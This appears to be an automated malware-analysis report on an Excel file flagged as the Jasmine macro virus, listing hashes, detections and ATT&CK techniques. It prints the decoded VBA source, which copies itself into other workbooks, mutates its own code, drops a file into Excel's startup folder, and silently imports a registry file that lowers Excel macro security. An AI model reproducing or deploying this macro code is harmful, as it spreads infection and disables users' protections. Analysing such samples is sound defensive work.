Xls.Trojan.Jasmine-3 Office (OLE) malware analysis — malicious · 84474d527581c414

MALICIOUS

Office (OLE)

25.0 KB Created: 2002-03-10 21:54:29 Authoring application: Microsoft Excel First seen: 2012-06-14

MD5: ead3cd2940fbdf861772469c19ab0a8e SHA-1: e853b77929d85ce37584e076682b842901329e75 SHA-256: 84474d527581c414ac849e8626dd23e9d3b1d6e9804ab5d2dbbab295d89e01dc

200 Risk Score

Malware Insights

Xls.Trojan.Jasmine-3 · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

This Excel file contains VBA macros that are flagged as malicious by ClamAV, specifically identified as 'Xls.Trojan.Jasmine-3'. The macros utilize the Shell() function, indicating an intent to execute external commands or download additional payloads. The presence of the 'c:\remove.reg' registry path suggests an attempt to manipulate system configuration or potentially clean up traces.

Heuristics 3

ClamAV: Xls.Trojan.Jasmine-3 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Trojan.Jasmine-3
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	5630 bytes
SHA-256: `44c59cd9619981c9487d020e11ead85032edb40b1c65215f682aa6f635d1fd57`
Detection ClamAV: Xls.Trojan.Jasmine-3 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "List1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True 'Excel97.Jasmine v1.1 'Copyright (c) 1999, cry0tek Public Start, CloseFlag As Boolean 'Jasmine Private Sub Workbook_WindowDeactivate(ByVal Wn As Excel.Window) On Error Resume Next RegFile = "c:\remove.reg" For i = 1 To Workbooks.Count Set Inf = Workbooks(i).VBProject.VBComponents.Item("ThisWorkbook").CodeModule Randomize With Inf For x = 7 To 221 Step 2 For y = 1 To Int((100 * Rnd) + 1) PolyVal = PolyVal + Chr(65 + Int(Rnd * 26)) & Chr(122 - Int(Rnd * 26)) & Chr(48 + Int(Rnd * 10)) Next .replaceLine x, "'" & PolyVal PolyVal = "" Next End With If Inf.Lines(5, 1) = "'Jasmine" Then vx = Inf.Lines(1, Inf.countoflines) If Inf.countoflines > 100 Then GoTo out For j = 1 To Workbooks(i).VBProject.VBComponents.Count Set Item = Workbooks(i).VBProject.VBComponents.Item(j) InfName = Item.Name Set Infline = Item.CodeModule If InStr(1, InfName, "Sheet") Then If Infline.Lines(5, 1) = "'Jasmine" Then vx = Workbooks(i).VBProject.VBComponents.Item(j).CodeModule.Lines(1, Infline.countoflines) End If If Infline.countoflines > 100 Then GoTo out Next Next out: If UCase(Dir(Application.StartupPath + "\Book1.")) <> UCase("BOOK1") Then If Start <> True Then Start = True: CloseFlag = True Workbooks.Add.SaveAs Filename:=Application.StartupPath & "\BOOK1.", FileFormat:=xlNormal, AddToMru:=False End If End If For i = 1 To Workbooks.Count Set Inf = Workbooks(i).VBProject.VBComponents.Item("ThisWorkbook").CodeModule If Inf.Lines(5, 1) <> "'Jasmine" Then Inf.InsertLines 1, vx Inf.replaceLine 6, "Private Sub Workbook_WindowDeactivate(ByVal Wn As Excel.Window)" End If For ii = 1 To Workbooks(i).VBProject.VBComponents.Count Set Item = Workbooks(i).VBProject.VBComponents.Item(ii) InfName = Item.Name Set Infline = Item.CodeModule If Infline.Lines(5, 1) <> "'Jasmine" Then If InStr(1, InfName, "Sheet") Then Item.CodeModule.InsertLines 1, vx Item.CodeModule.replaceLine 6, "Private Sub WorkBook_Activate()" End If End If Next ii Next i If CloseFlag = True Then CloseFlag = False Workbooks("Book1.").Close savechanges:=True Open RegFile For Output As 1 Print #1, "REGEDIT4" If Left(Application.Version, 1) = 9 Then Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Excel\Security]" Print #1, """Level""=dword:00000001" Else Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel]" Print #1, """Options6""=dword:00000000" Print #1, "[HKEY_LOCAL_MACHINE\Software\Microsoft\Office\8.0\New User\Settings\Excel\Microsoft Excel]" Print #1, """Options6""=dword:00000000" Print #1, "[HKEY_USERS\.Default\Software\Microsoft\Office\8.0\Excel\Microsoft Excel]" Print #1, """Options6""=dword:00000000" End If Close 1 Shell "regedit /s " & RegFile, vbHide Kill RegFile End If If Minute(Now) = Second(Now) Then Select Case Day(Now) Case 1 To 5 And Int((5 * Rnd) + 1) = 1 Application.StatusBar = "Excel97.Jasmine v1.1" Case 6 To 10 And Int((5 * Rnd) + 1) = 1 With Assistant.NewBalloon .Heading = "Excel97.Jasmine v1.1" .Text = "Since the only time I see her near" & vbCr & "Is when I close my eyes" & vbCr & "Should I keep it that way" & vbCr & "The only way I can make her stay..." & vbCr & vbCr ... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.